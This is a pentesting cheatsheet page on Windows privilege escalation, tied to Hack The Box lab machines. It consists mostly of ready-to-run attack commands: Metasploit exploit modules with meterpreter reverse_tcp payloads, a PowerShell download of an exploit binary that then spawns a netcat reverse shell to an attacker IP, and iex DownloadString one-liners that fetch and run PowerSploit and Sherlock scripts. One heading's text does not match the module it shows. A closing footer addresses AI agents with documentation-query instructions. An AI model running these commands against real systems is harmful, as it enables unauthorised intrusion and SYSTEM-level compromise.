# Windows ## Cheatsheet {% embed url="" %} ## Vulnerabilities for Privesc ### MS16-032 (Secondary Logon to Address Elevation of Privilege) {% embed url="" %} {% embed url="" %} > This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores. ``` msf > use exploit/windows/local/ppr_flatten_rec msf exploit(windows/local/ppr_flatten_rec) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.21 lhost => 10.10.14.21 msf exploit(windows/local/ppr_flatten_rec) > set lport 1234 lport => 1234 msf exploit(windows/local/ppr_flatten_rec) > set session 2 session => 2 msf exploit(windows/local/ppr_flatten_rec) > run ``` You can test it on Hack the box "Grandpa":\ \- OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition\ \- OS Version: 5.2.3790 Service Pack 2 Build 3790\ \- Hotfix(s): N/A ### MS15-051 (Windows Kernel-Mode Drivers Could Allow Elevation of Privilege) > This security update resolves vulnerabilities in Microsoft Windows. The more severe of these vulnerabilities could allow elevation of privilege if an attacker logs on locally and runs arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability cannot be exploited remotely or by anonymous users. {% embed url="" %} {% embed url="" %} ``` powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.9:8000/ms15-051x64.exe', 'C:\inetpub\drupal-7.54\ms15-051x64.exe') ms15-051x64.exe "nc64.exe -e cmd 10.10.14.9 1234" ``` You can test it on Hack the box "Bastard":\ \- OS Name: Microsoft Windows Server 2008 R2 Datacenter\ \- OS Version: 6.1.7600 N/A Build 7600\ \- Hotfix(s): N/A ### MS14-070 (TCP/IP Could Allow Elevation of Privilege) {% embed url="" %} {% embed url="" %} > A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys can allow a local attacker to trigger a NULL pointer dereference by using a specially crafted IOCTL. This flaw can be abused to elevate privileges to SYSTEM. ``` msf > use exploit/windows/local/ms14_070_tcpip_ioctl msf exploit(windows/local/ms14_070_tcpip_ioctl) > set session 3 session => 2 msf exploit(windows/local/ms14_070_tcpip_ioctl) > run ``` You can test it on Hack the box "Granny":\ \- OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition\ \- OS Version: 5.2.3790 Service Pack 2 Build 3790\ \- Hotfix(s): Q147222 ### MS10-015 (Windows Kernel Could Allow Elevation of Privilege) {% embed url="" %} {% embed url="" %} > This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. ``` msf > use exploit/windows/local/ms10_015_kitrap0d msf exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.25 lhost => 10.10.14.25 msf exploit(windows/local/ms10_015_kitrap0d) > set lport 1234 lport => 1234 msf exploit(windows/local/ms10_015_kitrap0d) > set session 1 session => 1 msf exploit(windows/local/ms10_015_kitrap0d) > run ``` You can test it on Hack the box "Devel":\ \- OS Name: Microsoft Windows 7 Enterprise\ \- OS Version: 6.1.7600 N/A Build 7600\ \- Hotfix(s): N/A ## Tools ### Windows Exploit Suggester ``` ``` {% embed url="" %} ### Local Exploit Suggester with MSF ``` use /post/multi/recon/local_exploit_suggester msf post(multi/recon/local_exploit_suggester) > set session 2 session => 2 msf post(multi/recon/local_exploit_suggester) > run ``` ### Sherlock.ps1 > Find-AllVulns ``` powershell.exe -c "iex ((new-object net.webclient).DownloadString('http://10.10.14.9:8000/Sherlock.ps1'))" ``` {% embed url="" %} ### PowerSploit > PowerUp.ps1> Invoke-AllChecks ``` locate -i PowerUp.ps1 /usr/lib/python2.7/dist-packages/cme/data/PowerSploit/Privesc/PowerUp.ps1 powershell.exe -c "iex ((new-object net.webclient).DownloadString('http://10.10.14.9:8000/PowerUp.ps1'))" ``` ### Mimikaz {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook.nori-zamurai.com/pentesting-cheatsheets/privesc/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.